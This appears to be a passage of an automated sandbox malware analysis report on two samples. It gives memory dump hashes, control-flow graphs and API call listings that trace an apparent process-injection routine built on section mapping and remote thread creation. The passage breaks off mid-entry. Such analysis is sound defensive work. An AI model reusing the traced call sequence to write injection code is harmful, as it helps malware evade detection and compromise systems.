Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
• Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
• Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
• Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
Memory Dump Source
• Source File: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_520000_bCnarg2O62.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction ID: f28657fdea962ab7d7c068d02efbe15b077ffee6a47d8b9873907585d2d5aae2
• Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction Fuzzy Hash: DB01F7766026108FDF21DF60E804BAB37F9FF87305F0544A4D506972C3E370A8418B80
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
• Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
• Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
• Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
• Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
• Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
• Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
• Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
• Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
• Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
• Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
• Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
• Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
• Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
• Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
• Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 40.7%
Signature Coverage: 0%
Total number of Nodes: 118
Total number of Limit Nodes: 4
(execution graph image not recoverable; API nodes present in the graph: Sleep, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, GetPEB, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA, SetErrorMode, RtlCreateUserThread, NtTerminateProcess, CreateToolhelp32Snapshot, Module32First)

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 112 4018c5 104->112 113 4018bc-4018e3 call 401193 104->113 105->106 114 4015c4-4015db NtDuplicateObject 105->114 106->104 112->113 114->106 117 4015e1-401605 NtCreateSection 114->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->106 121 40168d-401691 119->121 120->119 123 40162a-401646 NtMapViewOfSection 120->123 121->106 124 401697-4016b8 NtMapViewOfSection 121->124 123->119 126 401648-40165e 123->126 124->106 127 4016be-4016da NtMapViewOfSection 124->127 126->119 127->106 130 4016e0 call 4016e5 127->130
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 159 4018c5 151->159 160 4018bc-4018e3 call 401193 151->160 152->153 161 4015c4-4015db NtDuplicateObject 152->161 153->151 159->160 161->153 164 4015e1-401605 NtCreateSection 161->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->153 168 40168d-401691 166->168 167->166 170 40162a-401646 NtMapViewOfSection 167->170 168->153 171 401697-4016b8 NtMapViewOfSection 168->171 170->166 173 401648-40165e 170->173 171->153 174 4016be-4016da NtMapViewOfSection 171->174 173->166 174->153 177 4016e0 call 4016e5 174->177
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1652636561-0
                                                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 203 4018c5 195->203 204 4018bc-4018e3 call 401193 195->204 196->197 205 4015c4-4015db NtDuplicateObject 196->205 197->195 203->204 205->197 208 4015e1-401605 NtCreateSection 205->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->197 212 40168d-401691 210->212 211->210 214 40162a-401646 NtMapViewOfSection 211->214 212->197 215 401697-4016b8 NtMapViewOfSection 212->215 214->210 217 401648-40165e 214->217 215->197 218 4016be-4016da NtMapViewOfSection 215->218 217->210 218->197 221 4016e0 call 4016e5 218->221
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 242 4018c5 234->242 243 4018bc-4018e3 call 401193 234->243 235->236 244 4015c4-4015db NtDuplicateObject 235->244 236->234 242->243 244->236 247 4015e1-401605 NtCreateSection 244->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->236 251 40168d-401691 249->251 250->249 253 40162a-401646 NtMapViewOfSection 250->253 251->236 254 401697-4016b8 NtMapViewOfSection 251->254 253->249 256 401648-40165e 253->256 254->236 257 4016be-4016da NtMapViewOfSection 254->257 256->249 257->236 260 4016e0 call 4016e5 257->260
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 282 4018c5 274->282 283 4018bc-4018e3 call 401193 274->283 275->276 284 4015c4-4015db NtDuplicateObject 275->284 276->274 282->283 284->276 287 4015e1-401605 NtCreateSection 284->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->276 291 40168d-401691 289->291 290->289 293 40162a-401646 NtMapViewOfSection 290->293 291->276 294 401697-4016b8 NtMapViewOfSection 291->294 293->289 296 401648-40165e 293->296 294->276 297 4016be-4016da NtMapViewOfSection 294->297 296->289 297->276 300 4016e0 call 4016e5 297->300
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1921587553-0
                                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 0 4a003c-4a0047 1 4a0049 0->1 2 4a004c-4a0263 call 4a0a3f call 4a0e0f call 4a0d90 VirtualAlloc 0->2 1->2 17 4a028b-4a0292 2->17 18 4a0265-4a0289 call 4a0a69 2->18 20 4a02a1-4a02b0 17->20 22 4a02ce-4a03c2 VirtualProtect call 4a0cce call 4a0ce7 18->22 20->22 23 4a02b2-4a02cc 20->23 29 4a03d1-4a03e0 22->29 23->20 30 4a0439-4a04b8 VirtualFree 29->30 31 4a03e2-4a0437 call 4a0ce7 29->31 33 4a04be-4a04cd 30->33 34 4a05f4-4a05fe 30->34 31->29 36 4a04d3-4a04dd 33->36 37 4a077f-4a0789 34->37 38 4a0604-4a060d 34->38 36->34 40 4a04e3-4a0505 36->40 41 4a078b-4a07a3 37->41 42 4a07a6-4a07b0 37->42 38->37 43 4a0613-4a0637 38->43 51 4a0517-4a0520 40->51 52 4a0507-4a0515 40->52 41->42 44 4a086e-4a08be LoadLibraryA 42->44 45 4a07b6-4a07cb 42->45 46 4a063e-4a0648 43->46 50 4a08c7-4a08f9 44->50 48 4a07d2-4a07d5 45->48 46->37 49 4a064e-4a065a 46->49 53 4a07d7-4a07e0 48->53 54 4a0824-4a0833 48->54 49->37 55 4a0660-4a066a 49->55 56 4a08fb-4a0901 50->56 57 4a0902-4a091d 50->57 58 4a0526-4a0547 51->58 52->58 59 4a07e2 53->59 60 4a07e4-4a0822 53->60 62 4a0839-4a083c 54->62 61 4a067a-4a0689 55->61 56->57 66 4a054d-4a0550 58->66 59->54 60->48 63 4a068f-4a06b2 61->63 64 4a0750-4a077a 61->64 62->44 65 4a083e-4a0847 62->65 67 4a06ef-4a06fc 63->67 68 4a06b4-4a06ed 63->68 64->46 69 4a084b-4a086c 65->69 70 4a0849 65->70 72 4a05e0-4a05ef 66->72 73 4a0556-4a056b 66->73 74 4a074b 67->74 75 4a06fe-4a0748 67->75 68->67 69->62 70->44 72->36 76 4a056f-4a057a 73->76 77 4a056d 73->77 74->61 75->74 78 4a059b-4a05bb 76->78 79 4a057c-4a0599 76->79 77->72 84 4a05bd-4a05db 78->84 79->84 84->66
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004A024D
Strings
Memory Dump Source
• Source File: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4a0000_derhswe.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: e8808fda1f18410e8add9b7d654e39f1dace8b15439fa6e8a781bb971e8400d6
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 74527874A01229DFDB64CF58C984BA8BBB1BF09304F1480DAE90DAB351DB34AE95DF15

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0051EBB4
• Module32First.KERNEL32(00000000,00000224), ref: 0051EBD4
Memory Dump Source
• Source File: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_50c000_derhswe.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 848d11fd6c62f46b0253d74a4ff3b31582dfce861c711d36bd776ffb60a503a2
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 07F09C311047116FE7203BF59C8EBEE7AE8BF49724F100569F943910C0D770EC854A51

Control-flow Graph

APIs
• SetErrorMode.KERNELBASE(00000400,?,?,004A0223,?,?), ref: 004A0E19
• SetErrorMode.KERNELBASE(00000000,?,?,004A0223,?,?), ref: 004A0E1E
Memory Dump Source
• Source File: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4a0000_derhswe.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 4a69a7ed93f9a29727daf5d7a921b2a81f6fc96308f2a7e4260770afe9c2796a
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: F8D0123114512877DB002A94DC09BCE7B1CDF09B62F008411FB0DDD180C774994046E9

Control-flow Graph

APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
• Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
• Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
• Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Control-flow Graph

APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
• Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
• Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
• Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Control-flow Graph

APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
• Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
• Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
• Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Control-flow Graph

APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
